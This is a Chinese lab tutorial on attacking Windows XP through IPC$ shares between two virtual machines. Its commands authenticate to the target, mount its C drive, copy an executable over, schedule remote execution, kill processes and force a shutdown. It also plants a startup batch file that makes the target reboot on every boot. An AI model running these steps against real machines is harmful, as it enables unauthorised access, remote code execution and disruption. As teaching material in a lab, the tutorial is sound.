网络安全攻防之IPC$攻击
IPC$空会话攻击
我的实验环境是两台虚拟机,分别是windows xp sp3和windows xp sp2 。windows xp sp3作为主机,windows xp sp2作为靶机:
1.首先在靶机端运行cmd,输入命令net share查看当前系统中的硬盘是否处于共享状态,windows xp等在默认情况下都是开启资源共享服务的,同时查看windows xp的IP地址为192.168.44.130
2.文件共享服务对应的端口号分别是139(供NetBios名称使用),445(供IP地址使用),一般IPC$连接也是通过这两个端口的,所以在windows 2000的命令行中输入netstat –an查看当前这两个端口是否处于开启状态,如下图:
3.开始在windows xp端进行IPC$连接,在cmd中输入
net use \\192.168.44.130\ipc$ “(此处为计算机用户的密码)” /user:”(用户名)”,如下图:
可以看到命令成功完成,说明建立IPC空会话成功
4.将windows 2000系统上C盘的内容共享,使用如下命令:
net use z: \\192.168.44.130\c$
输入该命令后,在主机系统上就会出现共享C盘内容的Z盘驱动器,如下图:
5.向远程计算机复制文件,把windows xp系统C盘上的sogou_explorer.exe 复制到靶机的C盘上,并命名为sogou_explorer.exe,过程如下图:
命令如下:copy c:\sogou_explorer.exe z:\sogou_explorer.exe:
可以看到Z盘上出现了sogou_explorer.exe文件:
6.查看靶机的系统时间,命令是 net time \\192.168.44.130:
7.令远程计算机运行指定程序:
用如下命令:at \\192.168.44.130 9:27 c:\sogou_explorer.exe 可以看到新添加了一项作业:
8. 列出远程计算机当前运行的进程,在命令行中输入
tasklist /s 192.168.44.130 /u (远程计算机用户名) /p (密码):
9.终止远程计算机中当前运行的进程:
我选择终止的进程是cmd.exe 进程PID是3596
输入命令:taskkill /s 192.168.44.130 /u (远程计算机用户名) /p (密码):
可以看到PID为3596的cmd.exe进程被终止了:
10. 关闭远程计算机:在命令行中输入命令:
shutdown –s –t 30–m \\192.168.44.130 令远程计算机倒计时30秒后自动关机:
事实上在远程计算机上可以看到它自己被远程用户连接,打开计算机管理,点击共享文件夹中的会话,可以看到当前计算机用户被远程连接了,还有连接时间,打开文件等信息显示:
接下来再做一件事,让对方主机开机后自动重启,首先在主机上编写shutdown.bat文件,文件内容是shutdown –r 将该文件通过上面的copy方式复制到靶机中,将shutdown.bat文件拷贝到启动文件夹中,则当靶机开机时会自动运行该bat文件,过程如下图:
在主机中点开我的电脑中的Z盘,即共享出的靶机的C盘资源,将这个shutdown.bat文件剪切粘贴到Z盘的启动目录 Z:\Documents and Settings\All Users\[开始]菜单\程序\启动,这样靶机在开机后会自动运行这个bat文件,就会出现开机自动重启的情况:
网络安全攻防之IPC$攻击相关推荐
- 网络安全攻防演练的组织架构是什么?有哪些防守手段?
网络安全的本质在对抗,对抗的本质在攻防两端能力较量.不同层级.规模的攻防演习已经成为检验网络安全能力水平的重要手段,同时,也是维护网络空间安全的绸缪之举.高质量的网络攻防演习可以最大化的发现目前网络存 ...
- 《无线网络安全攻防实战》读书笔记
为什么80%的码农都做不了架构师?>>> <无线网络安全攻防实战> 虽然无线破解早就烂大街了,还是去图书馆把这本书补上了,做个笔记,以供以后参考,记得很全面但很乱. ...
- 喜讯 雨笋教育优秀学员荣获望城区网络安全攻防演练二等奖
雨笋君近日收到一份来自望城区网信办对雨笋优秀学员工作肯定的表扬信. 为切实做好2022年全国"两会"期间长沙市望城区网络安全保障工作,检验提升全区关键信息基础设施网络安全防护和应急 ...
- 网络安全攻防演练项目介绍
有很多朋友问我写的攻防演练是什么? 本文给予回答 网络安全攻防演练是公安部组织的面向税务.电力.电信.银行.铁路.财政.广电.水利.教育.互联网.检察院.法院.石油.交通等行业的政府单位/公司,开展的 ...
- 计算机网络攻防演练,网络安全攻防演练
"没有网络安全就没有国家安全",网络安全已经上升到国家安全的层面.网络安全从管理到技术保障都需要专业化的人员和团队.网络空间的竞争,归根结底是人才竞争,要采取开放的政策,聚天下英才 ...
- 网络安全攻防五件套,OCSP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
作为网络安全行业的爱好者/从业者,你还在搜安全教程.看书.加入各种圈子.下载学习资源.观看视频教程吗?兴趣和耐心还能支撑住吗? 搞攻防,重在理论+实践!想要路子正.方法对.见成效,网络安全攻防五件套( ...
- 攻防演练中攻击队攻击的必备能力
蓝队攻击的必备能力 开展网络渗透对蓝队人员的岗位技能和动手能力都有较高的要 求,这些能力要求侧重于攻防实战,是蓝队人员综合能力水平的体 现.因为蓝队人员在实战攻防演练中面对的是十分契合真实网络条件 的 ...
- [CTF/网络安全] 攻防世界 php_rce 解题详析
[CTF/网络安全] 攻防世界 php_rce 解题详析 PHP REC ThinkPHP V5漏洞Payload 姿势 总结 PHP REC PHP RCE 指的是通过远程代码执行漏洞(Remote ...
- 【大咖讲座】网络安全攻防对抗发展与趋势
为切实提高学生网络攻防实战能力,拓展学生对红蓝对抗前沿技术的认识,2023年3月2日9:30-11:00,北京斗象信息科技有限公司的王涛.王晓喆两位专家应网络空间安全与法治协同创新中心的邀请,围绕&q ...
最新文章
- 机器学习/深度学习 问题总结及解答
- 编写访问数据库的应用层程序,经常catch出的一些错误
- 三维点云学习(4)2-mean shift dbscan
- python的类与继承
- [面试]synchronized
- 《吃透微服务》—服务网关之Gateway
- 解决VMware虚拟机桥接模式无法上网
- android修改HOLO对话框风格
- 雷电模拟器修改本地IP
- 使用Exchange Server 2010搭建多域名邮件系统
- 短线王的盯盘宝怎么样_《(全九册)黑马王子操盘手记(1-9)黑马王子炒股入短线K线看盘技巧金融投资理财K线技术分析看盘方法新老股民学习炒股》黑马王子著【摘要 书评 在线阅读】-苏宁易购图书...
- 创建网页文件html,HTML快速入门之创建网页文件
- 完全用Linux:半年来,Linux高效完成我所有的工作!(转贴)
- 淘宝商品详情API接口(网页版,APP端二合一接口)
- 无服务器+域名也能搭建个人博客?真的,而且很快
- 徐姗玩赚中国:我用一个月时间做了一个几万粉的dy号,结果被限流了
- 核磁谱图分析步骤_测试干货|核磁共振好基友MestReNova—手把手教你做出一张核磁谱图...
- 伽罗华域(Galois Field,GF,有限域)
- 三级分销系统哪家好?360shop
- 零中频接收机频率转换图_低成本ADS-B接收机去混合技术
热门文章
- windows10出现扬声器小红叉问题的解决方法
- 小程序源码:独家修复登录接口社区论坛-多玩法安装简单
- PPT使用的一些技巧总结
- WPF触控程序开发(三)——类似IPhone相册的反弹效果
- Redis源码学习(13),t_set.c 学习(一),sadd,srem 命令学习
- 针对开放平台的架构理解
- google android win10 ios,Flutter入门安装 ,win10 Android studio 教程
- Windows Vista for Developers——第三部分:桌面窗口管理器
- 精通CSS.DIV网页样式与布局(四) ——页面背景
- 天地孤影任我行(东邪西毒电影原声曲)铃声 天地孤影任我行(...